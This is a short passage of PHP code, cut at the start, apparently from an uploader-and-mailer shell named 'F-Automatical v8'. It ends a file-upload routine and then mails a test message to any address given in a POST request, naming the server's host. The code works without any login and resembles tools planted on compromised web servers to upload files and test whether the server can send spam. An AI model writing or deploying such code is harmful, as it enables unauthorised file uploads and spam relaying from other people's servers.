UPloaded Successfully."; } } die("
"); } echo '
F-Automatical v8 [Sending test].
'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")","F-Automatical v8 [Sending test]."); echo '
Send an report to ['.$_POST['email'].'] - ID: '.$rand.'
'; echo ''; } ?>